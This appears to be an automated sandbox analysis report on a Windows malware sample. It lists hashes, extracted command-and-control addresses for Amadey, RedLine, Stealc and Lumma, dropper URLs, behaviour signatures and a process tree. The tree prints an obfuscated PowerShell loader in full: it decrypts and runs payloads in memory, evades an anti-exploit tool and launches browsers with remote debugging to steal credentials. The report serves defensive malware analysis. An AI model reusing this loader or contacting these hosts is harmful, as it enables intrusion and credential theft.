Analysis

  • max time kernel
    124s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2025 06:32

General

  • Target

    ffa05200d7a741017eb476eef981b041.exe

  • Size

    2.1MB

  • MD5

    ffa05200d7a741017eb476eef981b041

  • SHA1

    2272ca724539b2e2bef16f3017c1e1e3db9e9485

  • SHA256

    2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001

  • SHA512

    55be906ff0385337b94ea090d1ccb3c4fd0e7d813adca5d6eccd2cfc40c1cbcf3f68a981cf0f97e457737a0b1b57745870e8ded6e58a6834556cd0bfcb8531a9

  • SSDEEP

    49152:1CYg6rMK/aiLLsFf8lTlcZuY+1HSkB1SOpIBC8MiH:i6rbaiEiWH+YklIBC8MiH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

lumma

C2

https://mercharena.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 12 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ffa05200d7a741017eb476eef981b041.exe
    "C:\Users\Admin\AppData\Local\Temp\ffa05200d7a741017eb476eef981b041.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3108
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4408
      • C:\Users\Admin\AppData\Local\Temp\1014060001\8371616b8a.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\8371616b8a.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Users\Admin\AppData\Local\Temp\1014060001\8371616b8a.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\8371616b8a.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4028
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 968
          4⤵
          • Program crash
          PID:3588
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3604
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3996
      • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
        "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1672
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 968
          4⤵
          • Program crash
          PID:3584
      • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
        "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2244
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3404
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2832
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4148
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2036
      • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
        "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3100
      • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4548
      • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
        "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:1504
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4404
      • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
        "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3900
      • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
        "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5028
      • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
        "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1068
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4248
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:412
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 968
          4⤵
          • Program crash
          PID:396
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4356
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2540
      • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
        "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2604
        • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
          "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4472
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 968
          4⤵
          • Program crash
          PID:4460
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:3196
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:4676
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2696
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc5764cc40,0x7ffc5764cc4c,0x7ffc5764cc58
              6⤵
                PID:3420
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:2
                6⤵
                  PID:5084
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:3
                  6⤵
                    PID:4368
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2488 /prefetch:8
                    6⤵
                      PID:1600
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4788
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3360 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:2756
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:728
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4276,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                      6⤵
                        PID:3640
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:8
                        6⤵
                          PID:4684
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:8
                          6⤵
                            PID:4740
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,4624302196830343168,10685004116925676455,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5012 /prefetch:8
                            6⤵
                              PID:2924
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            PID:3336
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc576546f8,0x7ffc57654708,0x7ffc57654718
                              6⤵
                                PID:3988
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
                                6⤵
                                  PID:4404
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
                                  6⤵
                                    PID:1828
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
                                    6⤵
                                      PID:2700
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:728
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5356
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:2348
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1344,14608604923092206229,9164363720559748149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:1648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\pph4e" & exit
                                    5⤵
                                      PID:4056
